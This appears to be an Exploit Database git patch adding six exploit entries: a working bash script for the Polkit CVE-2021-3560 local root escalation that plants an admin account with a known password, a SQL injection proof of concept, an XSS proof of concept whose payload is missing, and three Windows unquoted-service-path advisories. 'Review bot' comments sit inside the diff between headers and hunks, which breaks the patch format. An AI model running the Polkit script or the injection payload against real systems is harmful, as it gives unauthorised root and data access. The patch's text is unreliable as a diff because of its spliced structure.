From 6406244acc7a53054dfa7ce96cecf2f2f7889d11 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 16 Jun 2021 05:01:56 +0000
Subject: [PATCH] DB: 2021-06-16

6 changes to exploits/shellcodes

Brother BRPrint Auditor - 'Multiple' Unquoted Service Path
SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path
Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path
Polkit 0.105-26 0.117-2 - Local Privilege Escalation
Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)
Client Management System 1.1 - 'Search' SQL Injection
---
 exploits/linux/local/50011.sh | 71 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/50007.txt | 20 +++++++++
 exploits/tru64/webapps/50008.txt | 19 +++++++++
 exploits/windows/local/50005.txt | 48 +++++++++++++++++++++
 exploits/windows/local/50009.txt | 28 +++++++++++++
 exploits/windows/local/50010.txt | 30 ++++++++++++++
 files_exploits.csv | 6 +++
 7 files changed, 222 insertions(+)
 create mode 100755 exploits/linux/local/50011.sh
 create mode 100644 exploits/php/webapps/50007.txt
 create mode 100644 exploits/tru64/webapps/50008.txt
 create mode 100644 exploits/windows/local/50005.txt
 create mode 100644 exploits/windows/local/50009.txt
 create mode 100644 exploits/windows/local/50010.txt

diff --git a/exploits/linux/local/50011.sh b/exploits/linux/local/50011.sh
new file mode 100755
index 000000000..9a2207d83
--- /dev/null
+++ b/exploits/linux/local/50011.sh
@@ -0,0 +1,71 @@
+# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation
+# Date: 06/11/2021
+# Exploit Author: J Smith (CadmusofThebes)
+# Vendor Homepage: https://www.freedesktop.org/
+# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html
+# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)
+# Tested on: Ubuntu 20.04, Fedora 33
+# CVE: CVE-2021-3560
+# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
+
+#!/bin/bash
+
+# Set the name and display name
+userName="hacked"
+realName="hacked"
+
+# Set the account as an administrator
+accountType=1
+
+# Set the password hash for 'password' and password hint
+password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'
+passHint="password"
+
+# Check Polkit version
+polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9)
+if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(yum list installed | grep polkit | grep -c 0.117-2)" ]]; then
+ echo "[*] Vulnerable version of polkit found"
+else
+ echo "[!] WARNING: Version of polkit might not vulnerable"
+fi
+
+# Validate user is running in SSH instead of desktop terminal
+if [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then
+ echo "[!] 
WARNING: SSH into localhost first before running this script in order to avoid authentication prompts"
+ exit
+fi
+
+# Test the dbus-send timing to load into exploit
+echo "[*] Determining dbus-send timing"
+realTime=$( TIMEFORMAT="%R"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d " " -f6 )
+halfTime=$(echo "scale=3;$realTime/2" | bc)
+
+# Check for user first in case previous run of script failed on password set
+if id "$userName" &>/dev/null; then
+ userid=$(id -u $userName)
+ echo "[*] New user $userName already exists with uid of $userid"
+else
+ userid=""
+ echo "[*] Attempting to create account"
+ while [[ $userid == "" ]]
+ do
+ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
+ if id "$userName" &>/dev/null; then
+ userid=$(id -u $userName)
+ echo "[*] New user $userName created with uid of $userid"
+ fi
+ done
+fi
+
+# Add the password to /etc/shadow
+echo "[*] Adding password to /etc/shadow"
+x=0
+while [ $x -lt 100 ]
+do
+ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
+ x=$(($x + 1))
+done
+
+echo "[*] Exploit complete! If the password does not work, run the exploit again"
+echo ""
+echo "[*] Run 'su - $userName', followed by 'sudo su' to gain root access"
\ No newline at end of file
diff --git a/exploits/php/webapps/50007.txt b/exploits/php/webapps/50007.txt
new file mode 100644
index 000000000..ef601615f
--- /dev/null
+++ b/exploits/php/webapps/50007.txt
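Review bot: The version probe `if [[ "$(apt list ... | grep -c 0.105-26)" -ge 1 || "$(yum list installed | grep polkit | grep -c 0.117-2)" ]]; then` can never reach its else branch, because `grep -c` prints `0` when nothing matches and a bare `"$(...)"` inside `[[ ]]` is only a non-empty-string test, so every host is reported as "[*] Vulnerable version of polkit found" while `polkitVersion` is computed and never consulted. Compare the count on the yum side too, `"$(yum list installed 2>/dev/null | grep polkit | grep -c 0.117-2)" -ge 1`, or test `polkitVersion` directly. Separately, `#!/bin/bash` sits on line 11 behind the comment header, so the committed 0755 file has no effective shebang and its interpretation is left to whatever invokes it; under `/bin/sh` (dash on Ubuntu) the `[[` tests and `$(( ))` keyword usage will not run as intended, so the shebang belongs on line 1. The `-z $SSH_CLIENT || -z $SSH_TTY` guard is appropriate since CVE-2021-3560 relies on no authentication agent answering, but the script leaves a persistent `hacked` admin account with a known SHA-256-crypt password behind, which deserves a cleanup note in the header for anyone running it on a shared test box.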
@@ -0,0 +1,20 @@
+# Exploit Title: Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)
+# Date: 14 June 2021
+# Exploit Author: BHAVESH KAUL
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
+# Version: 1.1
+# Tested on: Server: XAMPP
+
+# Description #
+
+Client Management System 1.1 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization.
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/clientms/admin/index.php
+2) Login as admin using test credentials: admin/Test@123
+3) Goto: http://localhost/clientms/admin/admin-profile.php
+4) Enter the following payload in the user name field:
+5) Click on Update
+6) Our payload is fired and stored
\ No newline at end of file
diff --git a/exploits/tru64/webapps/50008.txt b/exploits/tru64/webapps/50008.txt
new file mode 100644
index 000000000..eacf45048
--- /dev/null
+++ b/exploits/tru64/webapps/50008.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Client Management System 1.1 - 'Search' SQL Injection
+# Date: 14 June 2021
+# Exploit Author: BHAVESH KAUL
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
+# Version: 1.1
+# Tested on: Server: XAMPP
+
+# Description #
+
+Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization.
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/clientms/admin/index.php
+2) Login as admin using test credentials: admin/Test@123
+3) Goto: http://localhost/clientms/admin/search-invoices.php
+4) Enter the following payload in the search field: ' OR 'x'='x
+5) All results are showed instead of none ==> SQL Injection success
\ No newline at end of file
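Review bot: Step 4, `4) Enter the following payload in the user name field:`, names no payload, so the PoC cannot be reproduced from the advisory as committed; if an HTML tag was stripped somewhere between author and repository, it should be restored (escaped if the pipeline eats tags) or described in words. The write-up also never says where the stored user name is rendered back unescaped, which is what separates stored from reflected XSS, so a closing line such as `7) The username is displayed without encoding on <page>` would make the "Stored" claim checkable. Both steps run inside the admin session (`admin/Test@123`), so unless the field is shown to other users the impact is an admin self-XSS; that should be stated explicitly.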
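Review bot: This advisory is committed as `exploits/tru64/webapps/50008.txt` and indexed with platform `tru64`, yet it targets a PHP/MySQL application on XAMPP, exactly like its sibling 50007 which correctly lives under `exploits/php/webapps/`; the path and the CSV platform column should be `php`, otherwise platform-filtered searches will never surface it. The PoC demonstrates only a boolean bypass (`' OR 'x'='x` returning every invoice) and, as with 50007, requires an admin login, so the entry should say the injection is authenticated and whether `search-invoices.php` is the only affected query.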
diff --git a/exploits/windows/local/50005.txt b/exploits/windows/local/50005.txt
new file mode 100644
index 000000000..f9b9dc1ed
--- /dev/null
+++ b/exploits/windows/local/50005.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Brother BRPrint Auditor 3.0.7 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage: https://support.brother.com/
+# Software Links: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=dcp7060d_all&os=10013&dlid=dlf102753_000&flang=4&type3=214
+# Tested Version: 3.0.7
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+BrPrAuSvc BrAuSvc C:\Program Files
+(x86)\Brother\BRPrintAuditor\Brsvau3a.exe Auto
+
+Brother BRPrintAuditor Agent BRPA_Agent C:\Program Files
+(x86)\Brother\BRPrintAuditor\BRAgtSrv.exe Auto
+
+C:\Users\IEUser>sc qc BrAuSvc
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: BrAuSvc
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Brother\BRPrintAuditor\Brsvau3a.exe
+ GRUPO_ORDEN_CARGA : BrotherSplGroup
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : BrPrAuSvc
+ DEPENDENCIAS : Spooler
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\Users\IEUser>sc qc BRPA_Agent
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: BRPA_Agent
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Brother\BRPrintAuditor\BRAgtSrv.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Brother BRPrintAuditor Agent
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50009.txt b/exploits/windows/local/50009.txt
new file mode 100644
index 000000000..7d0e75024
--- /dev/null
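Review bot: The advisory proves the two `LocalSystem` services have the unquoted `NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRPrintAuditor\Brsvau3a.exe` / `BRAgtSrv.exe`, but never shows that a standard user can create the files Windows would try first, `C:\Program.exe` and `C:\Program Files.exe`; on a stock install those locations are normally not writable by non-administrators, so as written this is a hardening finding rather than a demonstrated privilege escalation. Add an `icacls C:\` line next to the `sc qc` output and state whether any ACE grants (W)/(F)/(M) to Users or Authenticated Users. Since `BrAuSvc` depends on `Spooler` and both services are AUTO_START, the note should also say how the planted binary gets executed (service restart rights, or reboot), because that is the second condition for exploitation.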
+++ b/exploits/windows/local/50009.txt
@@ -0,0 +1,28 @@
+# Exploit Title: SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage: https://www.sysgauge.com
+# Software Link: https://www.sysgauge.com/setups/sysgaugesrv_setup_v7.9.18.exe
+# Tested Version: 7.9.18
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+C:\>sc qc "SysGauge Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SysGauge Server
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\SysGauge
+Server\bin\sysgaus.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : SysGauge Server
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50010.txt b/exploits/windows/local/50010.txt
new file mode 100644
index 000000000..f1999dff9
--- /dev/null
+++ b/exploits/windows/local/50010.txt
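Review bot: The `wmic` discovery command at the top is followed by no output row for this service (50005 and 50010 both paste the matching row), so the only evidence is the `sc qc` line `NOMBRE_RUTA_BINARIO: C:\Program Files\SysGauge Server\bin\sysgaus.exe`. That path has two spaces, so Windows would try `C:\Program.exe` and `C:\Program Files\SysGauge.exe` first; the advisory should include `icacls "C:\Program Files"` output showing whether a standard user can create a file there, or say that it cannot and present the finding as a misconfiguration. The title's `' SysGauge Server'` also carries a stray leading space inside the quotes, which is copied verbatim into the files_exploits.csv description.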
@@ -0,0 +1,30 @@
+# Exploit Title: Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage: https://brother.com
+# Software Link: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=ads1000w_us&os=10013&dlid=dlf002778_000&flang=4&type3=46
+# Tested Version: 1.38
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+Brother BRAgent WBA_Agent_Client C:\Program Files
+(x86)\Brother\BRAgent\BRAgtSrv.exe Auto
+
+C:\>sc qc WBA_Agent_Client
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: WBA_Agent_Client
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Brother\BRAgent\BRAgtSrv.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Brother BRAgent
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 09daf1acb..5574d20ec 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
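Review bot: Same gap as the sibling Brother entry 50005: `NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRAgent\BRAgtSrv.exe` is unquoted and runs as `LocalSystem`, but nothing shows that `C:\Program.exe` or `C:\Program Files.exe` can be created by an unprivileged user, which is the condition that turns an unquoted path into privilege escalation. Add an `icacls C:\` check and one line on how `WBA_Agent_Client` gets restarted (whether Users hold start/stop rights on it, or a reboot is needed). The same binary name `BRAgtSrv.exe` appears in 50005 under `BRPrintAuditor`; if that is the same agent shipped with two products, a cross-reference between the two advisories would help readers.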
@@ -11364,6 +11364,10 @@ id,file,description,date,author,type,platform,port
 49997,exploits/windows/local/49997.txt,"Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path",2021-06-14,"Erick Galindo",local,windows,
 49999,exploits/windows/local/49999.txt,"WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows,
 50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows,
+50005,exploits/windows/local/50005.txt,"Brother BRPrint Auditor - 'Multiple' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
+50009,exploits/windows/local/50009.txt,"SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
+50010,exploits/windows/local/50010.txt,"Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
+50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44159,3 +44163,5 @@ id,file,description,date,author,type,platform,port
 49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",2021-06-14,"BHAVESH KAUL",webapps,php,
 49996,exploits/php/webapps/49996.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)",2021-06-14,"Mert Daş",webapps,php,
 49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php,
+50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",2021-06-15,"BHAVESH KAUL",webapps,php,
+50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,